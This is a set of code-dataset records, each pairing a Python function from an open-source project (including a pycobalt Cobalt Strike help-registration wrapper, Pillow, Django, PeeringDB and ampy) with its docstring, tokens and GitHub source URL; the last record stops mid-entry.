def ssh_command_register(*args, fork=None, sync=True): r""" Documentation from https://www.cobaltstrike.com/aggressor-script/functions.html: Register help information for an SSH console command. Arguments $1 - the command $2 - the short description of the command $3 - the long-form help for the command. Example ssh_alis echo { blog($1, "You typed: " . substr($1, 5)); } ssh_command_register( "echo", "echo posts to the current session's log", "Synopsis: echo [arguments]\n\nLog arguments to the SSH console"); """ return engine.call('ssh_command_register', args, fork=fork, sync=sync)
[ "def", "ssh_command_register", "(", "*", "args", ",", "fork", "=", "None", ",", "sync", "=", "True", ")", ":", "return", "engine", ".", "call", "(", "'ssh_command_register'", ",", "args", ",", "fork", "=", "fork", ",", "sync", "=", "sync", ")" ]
https://github.com/dcsync/pycobalt/blob/d3a630bfadaeeb6c99aad28f226abe48f6b4acca/pycobalt/aggressor.py#L6471-L6492
ricequant/rqalpha
d8b345ca3fde299e061c6a89c1f2c362c3584c96
rqalpha/core/strategy_context.py
python
RunInfo.slippage
(self)
return self._slippage
滑点水平
滑点水平
[ "滑点水平" ]
def slippage(self): # type: () -> float """ 滑点水平 """ return self._slippage
[ "def", "slippage", "(", "self", ")", ":", "# type: () -> float", "return", "self", ".", "_slippage" ]
https://github.com/ricequant/rqalpha/blob/d8b345ca3fde299e061c6a89c1f2c362c3584c96/rqalpha/core/strategy_context.py#L92-L97
FSecureLABS/Jandroid
e31d0dab58a2bfd6ed8e0a387172b8bd7c893436
libs/platform-tools/platform-tools_windows/systrace/catapult/systrace/systrace/tracing_agents/atrace_agent.py
python
AtraceAgent._collect_trace_data
(self)
return output
Reads the output from atrace and stops the trace.
Reads the output from atrace and stops the trace.
[ "Reads", "the", "output", "from", "atrace", "and", "stops", "the", "trace", "." ]
def _collect_trace_data(self): """Reads the output from atrace and stops the trace.""" result = self._stop_collect_trace() data_start = re.search(TRACE_START_REGEXP, result) if data_start: data_start = data_start.end(0) else: raise IOError('Unable to get atrace data. Did you forget adb root?') output = re.sub(ADB_IGNORE_REGEXP, '', result[data_start:]) return output
[ "def", "_collect_trace_data", "(", "self", ")", ":", "result", "=", "self", ".", "_stop_collect_trace", "(", ")", "data_start", "=", "re", ".", "search", "(", "TRACE_START_REGEXP", ",", "result", ")", "if", "data_start", ":", "data_start", "=", "data_start", ...
https://github.com/FSecureLABS/Jandroid/blob/e31d0dab58a2bfd6ed8e0a387172b8bd7c893436/libs/platform-tools/platform-tools_windows/systrace/catapult/systrace/systrace/tracing_agents/atrace_agent.py#L260-L270
google-research/recsim
55e50e4be736d222ffe8c2477ed1981b40f91605
recsim/simulator/environment.py
python
MultiUserEnvironment.reset
(self)
return (user_obs, self._current_documents)
Resets the environment and return the first observation. Returns: user_obs: An array of floats representing observations of the user's current state doc_obs: An OrderedDict of document observations keyed by document ids
Resets the environment and return the first observation.
[ "Resets", "the", "environment", "and", "return", "the", "first", "observation", "." ]
def reset(self): """Resets the environment and return the first observation. Returns: user_obs: An array of floats representing observations of the user's current state doc_obs: An OrderedDict of document observations keyed by document ids """ for user_model in self.user_model: user_model.reset() user_obs = [ user_model.create_observation() for user_model in self.user_model ] if self._resample_documents: self._do_resample_documents() self._current_documents = collections.OrderedDict( self._candidate_set.create_observation()) return (user_obs, self._current_documents)
[ "def", "reset", "(", "self", ")", ":", "for", "user_model", "in", "self", ".", "user_model", ":", "user_model", ".", "reset", "(", ")", "user_obs", "=", "[", "user_model", ".", "create_observation", "(", ")", "for", "user_model", "in", "self", ".", "user...
https://github.com/google-research/recsim/blob/55e50e4be736d222ffe8c2477ed1981b40f91605/recsim/simulator/environment.py#L238-L255
dimagi/commcare-hq
d67ff1d3b4c51fa050c19e60c3253a79d3452a39
corehq/apps/app_manager/models.py
python
LazyBlobDoc.save
(self, **params)
[]
def save(self, **params): def super_save(): super(LazyBlobDoc, self).save(**params) if self._LAZY_ATTACHMENTS: with self.atomic_blobs(super_save): for name, info in self._LAZY_ATTACHMENTS.items(): if not info['content_type']: info['content_type'] = ';'.join(filter(None, guess_type(name))) super(LazyBlobDoc, self).put_attachment(name=name, **info) # super_save() has succeeded by now for name, info in self._LAZY_ATTACHMENTS.items(): self.__set_cached_attachment(name, info['content']) self._LAZY_ATTACHMENTS.clear() else: super_save()
[ "def", "save", "(", "self", ",", "*", "*", "params", ")", ":", "def", "super_save", "(", ")", ":", "super", "(", "LazyBlobDoc", ",", "self", ")", ".", "save", "(", "*", "*", "params", ")", "if", "self", ".", "_LAZY_ATTACHMENTS", ":", "with", "self"...
https://github.com/dimagi/commcare-hq/blob/d67ff1d3b4c51fa050c19e60c3253a79d3452a39/corehq/apps/app_manager/models.py#L3971-L3985
kuri65536/python-for-android
26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891
python-modules/twisted/twisted/mail/imap4.py
python
MessageProducer.__init__
(self, msg, buffer = None, scheduler = None)
Produce this message. @param msg: The message I am to produce. @type msg: L{IMessage} @param buffer: A buffer to hold the message in. If None, I will use a L{tempfile.TemporaryFile}. @type buffer: file-like
Produce this message.
[ "Produce", "this", "message", "." ]
def __init__(self, msg, buffer = None, scheduler = None): """Produce this message. @param msg: The message I am to produce. @type msg: L{IMessage} @param buffer: A buffer to hold the message in. If None, I will use a L{tempfile.TemporaryFile}. @type buffer: file-like """ self.msg = msg if buffer is None: buffer = tempfile.TemporaryFile() self.buffer = buffer if scheduler is None: scheduler = iterateInReactor self.scheduler = scheduler self.write = self.buffer.write
[ "def", "__init__", "(", "self", ",", "msg", ",", "buffer", "=", "None", ",", "scheduler", "=", "None", ")", ":", "self", ".", "msg", "=", "msg", "if", "buffer", "is", "None", ":", "buffer", "=", "tempfile", ".", "TemporaryFile", "(", ")", "self", "...
https://github.com/kuri65536/python-for-android/blob/26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891/python-modules/twisted/twisted/mail/imap4.py#L5278-L5295
bendmorris/static-python
2e0f8c4d7ed5b359dc7d8a75b6fb37e6b6c5c473
Lib/_pyio.py
python
BufferedReader.__init__
(self, raw, buffer_size=DEFAULT_BUFFER_SIZE)
Create a new buffered reader using the given readable raw IO object.
Create a new buffered reader using the given readable raw IO object.
[ "Create", "a", "new", "buffered", "reader", "using", "the", "given", "readable", "raw", "IO", "object", "." ]
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE): """Create a new buffered reader using the given readable raw IO object. """ if not raw.readable(): raise OSError('"raw" argument must be readable.') _BufferedIOMixin.__init__(self, raw) if buffer_size <= 0: raise ValueError("invalid buffer size") self.buffer_size = buffer_size self._reset_read_buf() self._read_lock = Lock()
[ "def", "__init__", "(", "self", ",", "raw", ",", "buffer_size", "=", "DEFAULT_BUFFER_SIZE", ")", ":", "if", "not", "raw", ".", "readable", "(", ")", ":", "raise", "OSError", "(", "'\"raw\" argument must be readable.'", ")", "_BufferedIOMixin", ".", "__init__", ...
https://github.com/bendmorris/static-python/blob/2e0f8c4d7ed5b359dc7d8a75b6fb37e6b6c5c473/Lib/_pyio.py#L928-L939
JaniceWuo/MovieRecommend
4c86db64ca45598917d304f535413df3bc9fea65
movierecommend/venv1/Lib/site-packages/django/db/models/lookups.py
python
YearComparisonLookup.get_rhs_op
(self, connection, rhs)
return connection.operators[self.lookup_name] % rhs
[]
def get_rhs_op(self, connection, rhs): return connection.operators[self.lookup_name] % rhs
[ "def", "get_rhs_op", "(", "self", ",", "connection", ",", "rhs", ")", ":", "return", "connection", ".", "operators", "[", "self", ".", "lookup_name", "]", "%", "rhs" ]
https://github.com/JaniceWuo/MovieRecommend/blob/4c86db64ca45598917d304f535413df3bc9fea65/movierecommend/venv1/Lib/site-packages/django/db/models/lookups.py#L569-L570
peeringdb/peeringdb
47c6a699267b35663898f8d261159bdae9720f04
peeringdb_server/models.py
python
IXFMemberData.netixlan
(self)
return self._netixlan
Will either return a matching existing netixlan instance (asn,ip4,ip6) or a new netixlan if a matching netixlan does not currently exist. Any new netixlan will NOT be saved at this point. Note that the netixlan that matched may be currently soft-deleted (status=="deleted").
Will either return a matching existing netixlan instance (asn,ip4,ip6) or a new netixlan if a matching netixlan does not currently exist.
[ "Will", "either", "return", "a", "matching", "existing", "netixlan", "instance", "(", "asn", "ip4", "ip6", ")", "or", "a", "new", "netixlan", "if", "a", "matching", "netixlan", "does", "not", "currently", "exist", "." ]
def netixlan(self): """ Will either return a matching existing netixlan instance (asn,ip4,ip6) or a new netixlan if a matching netixlan does not currently exist. Any new netixlan will NOT be saved at this point. Note that the netixlan that matched may be currently soft-deleted (status=="deleted"). """ if not hasattr(self, "_netixlan"): if not hasattr(self, "for_deletion"): self.for_deletion = self.remote_data_missing try: if self.for_deletion: filters = self.id_filters( self.asn, self.ipaddr4, self.ipaddr6, check_protocols=False ) else: filters = self.id_filters(self.asn, self.ipaddr4, self.ipaddr6) if "ipaddr6" not in filters and "ipaddr4" not in filters: raise NetworkIXLan.DoesNotExist() self._netixlan = NetworkIXLan.objects.get(**filters) except NetworkIXLan.DoesNotExist: is_rs_peer = self.is_rs_peer if is_rs_peer is None: is_rs_peer = False self._netixlan = NetworkIXLan( ipaddr4=self.ipaddr4, ipaddr6=self.ipaddr6, speed=self.speed, asn=self.asn, operational=self.operational, is_rs_peer=is_rs_peer, ixlan=self.ixlan, network=self.net, status="ok", ) return self._netixlan
[ "def", "netixlan", "(", "self", ")", ":", "if", "not", "hasattr", "(", "self", ",", "\"_netixlan\"", ")", ":", "if", "not", "hasattr", "(", "self", ",", "\"for_deletion\"", ")", ":", "self", ".", "for_deletion", "=", "self", ".", "remote_data_missing", "...
https://github.com/peeringdb/peeringdb/blob/47c6a699267b35663898f8d261159bdae9720f04/peeringdb_server/models.py#L3522-L3570
scientifichackers/ampy
dd4ca50b57c3bd24decc8ca8059be8d9ee48a1a0
ampy/cli.py
python
rm
(remote_file)
Remove a file from the board. Remove the specified file from the board's filesystem. Must specify one argument which is the path to the file to delete. Note that this can't delete directories which have files inside them, but can delete empty directories. For example to delete main.py from the root of a board run: ampy --port /board/serial/port rm main.py
Remove a file from the board.
[ "Remove", "a", "file", "from", "the", "board", "." ]
def rm(remote_file): """Remove a file from the board. Remove the specified file from the board's filesystem. Must specify one argument which is the path to the file to delete. Note that this can't delete directories which have files inside them, but can delete empty directories. For example to delete main.py from the root of a board run: ampy --port /board/serial/port rm main.py """ # Delete the provided file/directory on the board. board_files = files.Files(_board) board_files.rm(remote_file)
[ "def", "rm", "(", "remote_file", ")", ":", "# Delete the provided file/directory on the board.", "board_files", "=", "files", ".", "Files", "(", "_board", ")", "board_files", ".", "rm", "(", "remote_file", ")" ]
https://github.com/scientifichackers/ampy/blob/dd4ca50b57c3bd24decc8ca8059be8d9ee48a1a0/ampy/cli.py#L284-L298
SJ001/AI-Feynman
a05bc4a5be23d6eb3e1d0b2f7eb1ab5b78a920ad
aifeynman/get_pareto.py
python
ParetoSet.plot
(self)
Plotting the Pareto frontier.
Plotting the Pareto frontier.
[ "Plotting", "the", "Pareto", "frontier", "." ]
def plot(self): """Plotting the Pareto frontier.""" array = self.to_array() plt.figure(figsize=(8, 6)) plt.plot(array[:, 0], array[:, 1], 'r.') plt.show()
[ "def", "plot", "(", "self", ")", ":", "array", "=", "self", ".", "to_array", "(", ")", "plt", ".", "figure", "(", "figsize", "=", "(", "8", ",", "6", ")", ")", "plt", ".", "plot", "(", "array", "[", ":", ",", "0", "]", ",", "array", "[", ":...
https://github.com/SJ001/AI-Feynman/blob/a05bc4a5be23d6eb3e1d0b2f7eb1ab5b78a920ad/aifeynman/get_pareto.py#L246-L251
linxid/Machine_Learning_Study_Path
558e82d13237114bbb8152483977806fc0c222af
Machine Learning In Action/Chapter8-Regression/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/index.py
python
InstallationCandidate.__eq__
(self, other)
return self._compare(other, lambda s, o: s == o)
[]
def __eq__(self, other): return self._compare(other, lambda s, o: s == o)
[ "def", "__eq__", "(", "self", ",", "other", ")", ":", "return", "self", ".", "_compare", "(", "other", ",", "lambda", "s", ",", "o", ":", "s", "==", "o", ")" ]
https://github.com/linxid/Machine_Learning_Study_Path/blob/558e82d13237114bbb8152483977806fc0c222af/Machine Learning In Action/Chapter8-Regression/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/index.py#L82-L83
Luodian/MADAN
7a2918da44f5203b72652bc4cba0e70057482114
cyclegan/data/base_data_loader.py
python
BaseDataLoader.initialize
(self, opt)
[]
def initialize(self, opt): self.opt = opt pass
[ "def", "initialize", "(", "self", ",", "opt", ")", ":", "self", ".", "opt", "=", "opt", "pass" ]
https://github.com/Luodian/MADAN/blob/7a2918da44f5203b72652bc4cba0e70057482114/cyclegan/data/base_data_loader.py#L5-L7
jgagneastro/coffeegrindsize
22661ebd21831dba4cf32bfc6ba59fe3d49f879c
App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/matplotlib/backends/_backend_tk.py
python
raise_msg_to_str
(msg)
return msg
msg is a return arg from a raise. Join with new lines
msg is a return arg from a raise. Join with new lines
[ "msg", "is", "a", "return", "arg", "from", "a", "raise", ".", "Join", "with", "new", "lines" ]
def raise_msg_to_str(msg): """msg is a return arg from a raise. Join with new lines""" if not isinstance(msg, str): msg = '\n'.join(map(str, msg)) return msg
[ "def", "raise_msg_to_str", "(", "msg", ")", ":", "if", "not", "isinstance", "(", "msg", ",", "str", ")", ":", "msg", "=", "'\\n'", ".", "join", "(", "map", "(", "str", ",", "msg", ")", ")", "return", "msg" ]
https://github.com/jgagneastro/coffeegrindsize/blob/22661ebd21831dba4cf32bfc6ba59fe3d49f879c/App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/matplotlib/backends/_backend_tk.py#L57-L61
SteveDoyle2/pyNastran
eda651ac2d4883d95a34951f8a002ff94f642a1a
pyNastran/gui/utils/qt/qelement_edit.py
python
QNodeElementEdit.on_focus_callback
(self, eids, nids, name)
the callback method for ``on_focus``
the callback method for ``on_focus``
[ "the", "callback", "method", "for", "on_focus" ]
def on_focus_callback(self, eids, nids, name): """the callback method for ``on_focus``""" raise NotImplementedError('write_patran_syntax_dict callback')
[ "def", "on_focus_callback", "(", "self", ",", "eids", ",", "nids", ",", "name", ")", ":", "raise", "NotImplementedError", "(", "'write_patran_syntax_dict callback'", ")" ]
https://github.com/SteveDoyle2/pyNastran/blob/eda651ac2d4883d95a34951f8a002ff94f642a1a/pyNastran/gui/utils/qt/qelement_edit.py#L64-L66
google/pytype
fa43edc95dd42ade6e3147d6580d63e778c9d506
pytype/state.py
python
split_conditions
(node, var)
return (_restrict_condition(node, var.bindings, True), _restrict_condition(node, var.bindings, False))
Return a pair of conditions for the value being true and false.
Return a pair of conditions for the value being true and false.
[ "Return", "a", "pair", "of", "conditions", "for", "the", "value", "being", "true", "and", "false", "." ]
def split_conditions(node, var): """Return a pair of conditions for the value being true and false.""" return (_restrict_condition(node, var.bindings, True), _restrict_condition(node, var.bindings, False))
[ "def", "split_conditions", "(", "node", ",", "var", ")", ":", "return", "(", "_restrict_condition", "(", "node", ",", "var", ".", "bindings", ",", "True", ")", ",", "_restrict_condition", "(", "node", ",", "var", ".", "bindings", ",", "False", ")", ")" ]
https://github.com/google/pytype/blob/fa43edc95dd42ade6e3147d6580d63e778c9d506/pytype/state.py#L331-L334
IJDykeman/wangTiles
7c1ee2095ebdf7f72bce07d94c6484915d5cae8b
experimental_code/tiles_3d/venv_mac/lib/python2.7/site-packages/pip/utils/__init__.py
python
captured_stdout
()
return captured_output('stdout')
Capture the output of sys.stdout: with captured_stdout() as stdout: print('hello') self.assertEqual(stdout.getvalue(), 'hello\n') Taken from Lib/support/__init__.py in the CPython repo.
Capture the output of sys.stdout:
[ "Capture", "the", "output", "of", "sys", ".", "stdout", ":" ]
def captured_stdout(): """Capture the output of sys.stdout: with captured_stdout() as stdout: print('hello') self.assertEqual(stdout.getvalue(), 'hello\n') Taken from Lib/support/__init__.py in the CPython repo. """ return captured_output('stdout')
[ "def", "captured_stdout", "(", ")", ":", "return", "captured_output", "(", "'stdout'", ")" ]
https://github.com/IJDykeman/wangTiles/blob/7c1ee2095ebdf7f72bce07d94c6484915d5cae8b/experimental_code/tiles_3d/venv_mac/lib/python2.7/site-packages/pip/utils/__init__.py#L798-L807
armijnhemel/binaryanalysis-ng
34c655ed71d3d022ee49c4e1271002b2ebf40001
src/parsers/media/au/UnpackParser.py
python
AuUnpackParser.set_metadata_and_labels
(self)
sets metadata and labels for the unpackresults
sets metadata and labels for the unpackresults
[ "sets", "metadata", "and", "labels", "for", "the", "unpackresults" ]
def set_metadata_and_labels(self): """sets metadata and labels for the unpackresults""" labels = [ 'au', 'audio' ] metadata = {} if self.data.header.comment != '': metadata['comment'] = self.data.header.comment self.unpack_results.set_metadata(metadata) self.unpack_results.set_labels(labels)
[ "def", "set_metadata_and_labels", "(", "self", ")", ":", "labels", "=", "[", "'au'", ",", "'audio'", "]", "metadata", "=", "{", "}", "if", "self", ".", "data", ".", "header", ".", "comment", "!=", "''", ":", "metadata", "[", "'comment'", "]", "=", "s...
https://github.com/armijnhemel/binaryanalysis-ng/blob/34c655ed71d3d022ee49c4e1271002b2ebf40001/src/parsers/media/au/UnpackParser.py#L63-L71
home-assistant/core
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
homeassistant/components/point/__init__.py
python
MinutPointClient.is_available
(self, device_id)
return device_id in self._client.device_ids
Return device availability.
Return device availability.
[ "Return", "device", "availability", "." ]
def is_available(self, device_id): """Return device availability.""" if not self._is_available: return False return device_id in self._client.device_ids
[ "def", "is_available", "(", "self", ",", "device_id", ")", ":", "if", "not", "self", ".", "_is_available", ":", "return", "False", "return", "device_id", "in", "self", ".", "_client", ".", "device_ids" ]
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/point/__init__.py#L228-L232
pytorch/fairseq
1575f30dd0a9f7b3c499db0b4767aa4e9f79056c
fairseq/data/audio/data_cfg.py
python
S2TDataConfig.speaker_set_filename
(self)
return self.config.get("speaker_set_filename", None)
speaker set file under data root
speaker set file under data root
[ "speaker", "set", "file", "under", "data", "root" ]
def speaker_set_filename(self): """speaker set file under data root""" return self.config.get("speaker_set_filename", None)
[ "def", "speaker_set_filename", "(", "self", ")", ":", "return", "self", ".", "config", ".", "get", "(", "\"speaker_set_filename\"", ",", "None", ")" ]
https://github.com/pytorch/fairseq/blob/1575f30dd0a9f7b3c499db0b4767aa4e9f79056c/fairseq/data/audio/data_cfg.py#L51-L53
nobody132/masr
cf324178982d5a96cfd6a8384b8dfd077d9eab50
decoder.py
python
Decoder.decode
(self, probs, sizes=None)
Given a matrix of character probabilities, returns the decoder's best guess of the transcription Arguments: probs: Tensor of character probabilities, where probs[c,t] is the probability of character c at time t sizes(optional): Size of each sequence in the mini-batch Returns: string: sequence of the model's best guess for the transcription
Given a matrix of character probabilities, returns the decoder's best guess of the transcription
[ "Given", "a", "matrix", "of", "character", "probabilities", "returns", "the", "decoder", "s", "best", "guess", "of", "the", "transcription" ]
def decode(self, probs, sizes=None): """ Given a matrix of character probabilities, returns the decoder's best guess of the transcription Arguments: probs: Tensor of character probabilities, where probs[c,t] is the probability of character c at time t sizes(optional): Size of each sequence in the mini-batch Returns: string: sequence of the model's best guess for the transcription """ raise NotImplementedError
[ "def", "decode", "(", "self", ",", "probs", ",", "sizes", "=", "None", ")", ":", "raise", "NotImplementedError" ]
https://github.com/nobody132/masr/blob/cf324178982d5a96cfd6a8384b8dfd077d9eab50/decoder.py#L60-L72
kuri65536/python-for-android
26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891
python-modules/twisted/twisted/persisted/journal/base.py
python
Journal._reallyExecute
(self, index, command, runTime)
return result
Callback called when logging command is done.
Callback called when logging command is done.
[ "Callback", "called", "when", "logging", "command", "is", "done", "." ]
def _reallyExecute(self, index, command, runTime): """Callback called when logging command is done.""" result = command.execute(self.journaledService, runTime) self.latestIndex = index return result
[ "def", "_reallyExecute", "(", "self", ",", "index", ",", "command", ",", "runTime", ")", ":", "result", "=", "command", ".", "execute", "(", "self", ".", "journaledService", ",", "runTime", ")", "self", ".", "latestIndex", "=", "index", "return", "result" ...
https://github.com/kuri65536/python-for-android/blob/26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891/python-modules/twisted/twisted/persisted/journal/base.py#L54-L58
jython/jython3
def4f8ec47cb7a9c799ea4c745f12badf92c5769
lib-python/3.5.1/distutils/command/bdist_msi.py
python
bdist_msi.add_find_python
(self)
Adds code to the installer to compute the location of Python. Properties PYTHON.MACHINE.X.Y and PYTHON.USER.X.Y will be set from the registry for each version of Python. Properties TARGETDIRX.Y will be set from PYTHON.USER.X.Y if defined, else from PYTHON.MACHINE.X.Y. Properties PYTHONX.Y will be set to TARGETDIRX.Y\\python.exe
Adds code to the installer to compute the location of Python.
[ "Adds", "code", "to", "the", "installer", "to", "compute", "the", "location", "of", "Python", "." ]
def add_find_python(self): """Adds code to the installer to compute the location of Python. Properties PYTHON.MACHINE.X.Y and PYTHON.USER.X.Y will be set from the registry for each version of Python. Properties TARGETDIRX.Y will be set from PYTHON.USER.X.Y if defined, else from PYTHON.MACHINE.X.Y. Properties PYTHONX.Y will be set to TARGETDIRX.Y\\python.exe""" start = 402 for ver in self.versions: install_path = r"SOFTWARE\Python\PythonCore\%s\InstallPath" % ver machine_reg = "python.machine." + ver user_reg = "python.user." + ver machine_prop = "PYTHON.MACHINE." + ver user_prop = "PYTHON.USER." + ver machine_action = "PythonFromMachine" + ver user_action = "PythonFromUser" + ver exe_action = "PythonExe" + ver target_dir_prop = "TARGETDIR" + ver exe_prop = "PYTHON" + ver if msilib.Win64: # type: msidbLocatorTypeRawValue + msidbLocatorType64bit Type = 2+16 else: Type = 2 add_data(self.db, "RegLocator", [(machine_reg, 2, install_path, None, Type), (user_reg, 1, install_path, None, Type)]) add_data(self.db, "AppSearch", [(machine_prop, machine_reg), (user_prop, user_reg)]) add_data(self.db, "CustomAction", [(machine_action, 51+256, target_dir_prop, "[" + machine_prop + "]"), (user_action, 51+256, target_dir_prop, "[" + user_prop + "]"), (exe_action, 51+256, exe_prop, "[" + target_dir_prop + "]\\python.exe"), ]) add_data(self.db, "InstallExecuteSequence", [(machine_action, machine_prop, start), (user_action, user_prop, start + 1), (exe_action, None, start + 2), ]) add_data(self.db, "InstallUISequence", [(machine_action, machine_prop, start), (user_action, user_prop, start + 1), (exe_action, None, start + 2), ]) add_data(self.db, "Condition", [("Python" + ver, 0, "NOT TARGETDIR" + ver)]) start += 4 assert start < 500
[ "def", "add_find_python", "(", "self", ")", ":", "start", "=", "402", "for", "ver", "in", "self", ".", "versions", ":", "install_path", "=", "r\"SOFTWARE\\Python\\PythonCore\\%s\\InstallPath\"", "%", "ver", "machine_reg", "=", "\"python.machine.\"", "+", "ver", "u...
https://github.com/jython/jython3/blob/def4f8ec47cb7a9c799ea4c745f12badf92c5769/lib-python/3.5.1/distutils/command/bdist_msi.py#L323-L375
python-pillow/Pillow
fd2b07c454b20e1e9af0cea64923b21250f8f8d6
src/PIL/ImageDraw.py
python
ImageDraw.__init__
(self, im, mode=None)
Create a drawing instance. :param im: The image to draw in. :param mode: Optional mode to use for color values. For RGB images, this argument can be RGB or RGBA (to blend the drawing into the image). For all other modes, this argument must be the same as the image mode. If omitted, the mode defaults to the mode of the image.
Create a drawing instance.
[ "Create", "a", "drawing", "instance", "." ]
def __init__(self, im, mode=None): """ Create a drawing instance. :param im: The image to draw in. :param mode: Optional mode to use for color values. For RGB images, this argument can be RGB or RGBA (to blend the drawing into the image). For all other modes, this argument must be the same as the image mode. If omitted, the mode defaults to the mode of the image. """ im.load() if im.readonly: im._copy() # make it writeable blend = 0 if mode is None: mode = im.mode if mode != im.mode: if mode == "RGBA" and im.mode == "RGB": blend = 1 else: raise ValueError("mode mismatch") if mode == "P": self.palette = im.palette else: self.palette = None self._image = im self.im = im.im self.draw = Image.core.draw(self.im, blend) self.mode = mode if mode in ("I", "F"): self.ink = self.draw.draw_ink(1) else: self.ink = self.draw.draw_ink(-1) if mode in ("1", "P", "I", "F"): # FIXME: fix Fill2 to properly support matte for I+F images self.fontmode = "1" else: self.fontmode = "L" # aliasing is okay for other modes self.fill = 0 self.font = None
[ "def", "__init__", "(", "self", ",", "im", ",", "mode", "=", "None", ")", ":", "im", ".", "load", "(", ")", "if", "im", ".", "readonly", ":", "im", ".", "_copy", "(", ")", "# make it writeable", "blend", "=", "0", "if", "mode", "is", "None", ":",...
https://github.com/python-pillow/Pillow/blob/fd2b07c454b20e1e9af0cea64923b21250f8f8d6/src/PIL/ImageDraw.py#L47-L87
sagemath/sage
f9b2db94f675ff16963ccdefba4f1a3393b3fe0d
src/sage/functions/hypergeometric.py
python
Hypergeometric._evalf_
(self, a, b, z, parent, algorithm=None)
return mpmath_utils.call(hyper, aa, bb, z, parent=parent)
TESTS:: sage: hypergeometric([1, 1], [2], -1).n() 0.693147180559945 sage: hypergeometric([], [], RealField(100)(1)) 2.7182818284590452353602874714
TESTS::
[ "TESTS", "::" ]
def _evalf_(self, a, b, z, parent, algorithm=None): """ TESTS:: sage: hypergeometric([1, 1], [2], -1).n() 0.693147180559945 sage: hypergeometric([], [], RealField(100)(1)) 2.7182818284590452353602874714 """ if not isinstance(a, tuple) or not isinstance(b, tuple): raise TypeError("The first two parameters must be of type list") from mpmath import hyper aa = [rational_param_as_tuple(c) for c in a] bb = [rational_param_as_tuple(c) for c in b] return mpmath_utils.call(hyper, aa, bb, z, parent=parent)
[ "def", "_evalf_", "(", "self", ",", "a", ",", "b", ",", "z", ",", "parent", ",", "algorithm", "=", "None", ")", ":", "if", "not", "isinstance", "(", "a", ",", "tuple", ")", "or", "not", "isinstance", "(", "b", ",", "tuple", ")", ":", "raise", "...
https://github.com/sagemath/sage/blob/f9b2db94f675ff16963ccdefba4f1a3393b3fe0d/src/sage/functions/hypergeometric.py#L349-L364
MontrealCorpusTools/Montreal-Forced-Aligner
63473f9a4fabd31eec14e1e5022882f85cfdaf31
montreal_forced_aligner/dictionary/pronunciation.py
python
PronunciationDictionaryMixin._write_fst_text_disambiguated
( self, multispeaker_dictionary: Optional[MultispeakerDictionaryMixin] = None )
Write the text L_disambig.fst file to the temporary directory Parameters ---------- multispeaker_dictionary: MultispeakerDictionaryMixin, optional Main dictionary with phone mappings
Write the text L_disambig.fst file to the temporary directory
[ "Write", "the", "text", "L_disambig", ".", "fst", "file", "to", "the", "temporary", "directory" ]
def _write_fst_text_disambiguated( self, multispeaker_dictionary: Optional[MultispeakerDictionaryMixin] = None ) -> None: """ Write the text L_disambig.fst file to the temporary directory Parameters ---------- multispeaker_dictionary: MultispeakerDictionaryMixin, optional Main dictionary with phone mappings """ lexicon_fst_path = os.path.join( self.dictionary_output_directory, "lexicon_disambig.text.fst" ) if multispeaker_dictionary is not None: sil_disambiguation = f"#{multispeaker_dictionary.max_disambiguation_symbol + 1}" else: sil_disambiguation = f"#{self.max_disambiguation_symbol + 1}" assert self.silence_probability start_state = 0 loop_state = 1 silence_state = 2 next_state = 3 silence_phone = self.optional_silence_phone silence_cost = -1 * math.log(self.silence_probability) no_silence_cost = -1 * math.log(1 - self.silence_probability) with open(lexicon_fst_path, "w", encoding="utf8") as outf: outf.write( f"{start_state}\t{loop_state}\t<eps>\t<eps>\t{no_silence_cost}\n" ) # no silence outf.write( f"{start_state}\t{silence_state}\t<eps>\t<eps>\t{silence_cost}\n" ) # silence silence_disambiguation_state = next_state next_state += 1 outf.write( f"{silence_state}\t{silence_disambiguation_state}\t{silence_phone}\t<eps>\t0.0\n" ) # silence disambig outf.write( f"{silence_disambiguation_state}\t{loop_state}\t{sil_disambiguation}\t<eps>\t0.0\n" ) # silence disambig for w in sorted(self.words.keys()): if self.exclude_for_alignment(w): continue for pron in sorted(self.words[w].pronunciations): phones = list(pron.pronunciation) prob = pron.probability disambig_symbol = pron.disambiguation if self.position_dependent_phones: if len(phones) == 1: phones[0] += "_S" else: for i in range(len(phones)): if i == 0: phones[i] += "_B" elif i == len(phones) - 1: phones[i] += "_E" else: phones[i] += "_I" if not prob: prob = 0.001 # Dithering to ensure low probability entries pron_cost = abs(math.log(prob)) if disambig_symbol: phones += [f"#{disambig_symbol}"] current_state = loop_state for i in range(0, len(phones) - 1): p = phones[i] outf.write( f"{current_state}\t{next_state}\t{p}\t{w if i == 0 else '<eps>'}\t{pron_cost if i == 0 else 0.0}\n" ) current_state = next_state next_state += 1 i = len(phones) - 1 local_no_silence_cost = no_silence_cost + pron_cost local_silcost = silence_cost + pron_cost if i <= 0: local_silcost = silence_cost local_no_silence_cost = no_silence_cost outf.write( f"{current_state}\t{loop_state}\t{phones[i] if i >= 0 else '<eps>'}\t{w if i <= 0 else '<eps>'}\t{local_no_silence_cost}\n" ) outf.write( f"{current_state}\t{silence_state}\t{phones[i] if i >= 0 else '<eps>'}\t{w if i <= 0 else '<eps>'}\t{local_silcost}\n" ) outf.write(f"{loop_state}\t0.0\n")
[ "def", "_write_fst_text_disambiguated", "(", "self", ",", "multispeaker_dictionary", ":", "Optional", "[", "MultispeakerDictionaryMixin", "]", "=", "None", ")", "->", "None", ":", "lexicon_fst_path", "=", "os", ".", "path", ".", "join", "(", "self", ".", "dictio...
https://github.com/MontrealCorpusTools/Montreal-Forced-Aligner/blob/63473f9a4fabd31eec14e1e5022882f85cfdaf31/montreal_forced_aligner/dictionary/pronunciation.py#L779-L872
cobrateam/splinter
a3f30f53d886709e60218e46b521cbd87e9caadd
splinter/driver/__init__.py
python
DriverAPI.find_option_by_value
(self, value)
Find ``<option>`` elements by their value. Returns an instance of :class:`ElementList <splinter.element_list.ElementList>` Arguments: value (str): value to use in the search query.
Find ``<option>`` elements by their value.
[ "Find", "<option", ">", "elements", "by", "their", "value", "." ]
